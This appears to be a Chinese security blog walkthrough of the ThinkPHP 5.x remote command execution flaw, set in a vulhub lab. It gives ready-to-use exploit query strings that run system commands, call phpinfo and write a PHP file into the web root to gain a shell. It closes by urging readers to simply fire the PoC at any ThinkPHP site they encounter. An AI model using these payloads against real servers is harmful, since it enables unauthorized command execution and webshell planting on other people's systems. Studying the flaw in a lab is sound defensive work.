常见框架漏洞之一:Thinkphp5x

ThinkPHP是为了简化企业级应⽤开发和敏捷WEB应⽤开发⽽诞⽣的,是⼀个快速、兼容⽽且简单的轻量级国产PHP开发框架,诞⽣于2006年初,原名FCS,2007年元旦正式更名为

ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使⽤⾯向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。

ThinkPHP可以⽀持windows/Unix/Linux等服务器环境,正式版需要PHP5.0以上版本⽀持,⽀持MySql、PgSQL、Sqlite多种数据库以及PDO扩展,是⼀款跨平台,跨版本以及简单易⽤的PHP框架。 TP(2-6) (5-⽬前使⽤率较⾼的)

Thinkphp5x远程命令执⾏及getshell

thinkphp5最出名的就是rce

环境配置

云服务器:8.138.19.182:8080

靶场:vulhub/thinkphp/5-rce

docker-compose up -d #启动环境

访问靶场:http://8.138.19.182:8080/

漏洞利⽤

漏洞根本源于 thinkphp/library/think/Request.php 中method⽅法可以进⾏变量覆盖,通

过覆盖类的核⼼属性filter导致rce,其攻击点较为多,有些还具有限制条件,另外由于种种部分

原因,在利⽤上会出现⼀些问题。

远程命令执⾏
复制代码
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
远程代码执⾏
复制代码
?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
getshell
复制代码
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php phpinfo();?>" >>1.php

根⽬录⽣成1.php ⽂件,输出phpinfo

Thinkphp被曝很多漏洞,截⾄⽬前位置3x -- 6x的各个版本都被爆有⼤量漏洞,遇到TP的站,直接打poc就可以了;

相关推荐
中科三方1 天前
域名解析怎么查询?有哪些域名解析查询方式?
网络安全
Thanks_ks1 天前
计算机网络全维度解析:架构协议、关键设备、安全机制与新兴技术深度融合
网络安全·网络设备·量子通信·计算机网络架构·协议体系·新兴技术·5g 技术
lubiii_1 天前
攻防世界János-the-Ripper
安全·网络安全
枷锁—sha1 天前
【HW系列】—C2远控服务器(webshell链接工具, metasploit、cobaltstrike)的漏洞特征流量特征
运维·服务器·网络·测试工具·web安全·网络安全
落寞的魚丶1 天前
第三届宁波技能大赛网络安全赛项样题
网络安全·渗透测试·ctf·服务器配置·第三届宁波技能大赛
small_white_robot2 天前
Tomcat- AJP协议文件读取/命令执行漏洞(幽灵猫复现)详细步骤
java·linux·网络·安全·web安全·网络安全·tomcat
半个西瓜.2 天前
JWT安全:假密钥.【签名随便写实现越权绕过.】
网络·安全·web安全·网络安全·安全威胁分析
pencek2 天前
XCTF-web-mfw
网络安全
zhangzeyuaaa2 天前
CPU特权级别:硬件与软件协同构建系统安全的基石
安全·系统安全
2501_916008892 天前
Flutter、React Native、Unity 下的 iOS 性能与调试实践:兼容性挑战与应对策略(含 KeyMob 工具经验)
websocket·网络协议·tcp/ip·http·网络安全·https·udp